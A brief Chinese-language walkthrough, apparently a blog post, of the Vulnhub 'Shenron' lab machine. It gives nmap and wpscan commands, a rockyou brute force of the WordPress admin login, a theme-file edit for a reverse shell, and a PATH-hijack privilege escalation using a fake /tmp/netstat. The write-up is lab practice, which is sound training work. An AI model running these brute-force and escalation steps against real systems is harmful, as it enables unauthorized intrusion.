kali:192.168.111.111
靶机:192.168.111.171
信息收集
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.171
修改hosts后访问目标80端口,发现是wordpress
wpscan收集目标用户,爆破出密码:iloverockyou
wpscan --url http://shenron/ -e u
wpscan --url http://shenron/ -U admin -P /usr/share/wordlists/rockyou.txt
登录后修改目标源码拿shell
修改后访问http://shenron/wp-content/themes/twentyeleven/404.php
获得反弹shell
提权
shenron用户的密码也是iloverockyou
在shenron用户家目录下发现network程序,执行后发现该程序会执行netstat
命令,修改环境变量提权
echo '/bin/bash' > /tmp/netstat
chmod 777 /tmp/netstat
export PATH=/tmp:$PATH
./network
flag
标签:tmp,http,--,192.168,netstat,shenron,Vulnhub,靶机 From: https://www.cnblogs.com/ctostm/p/17593784.html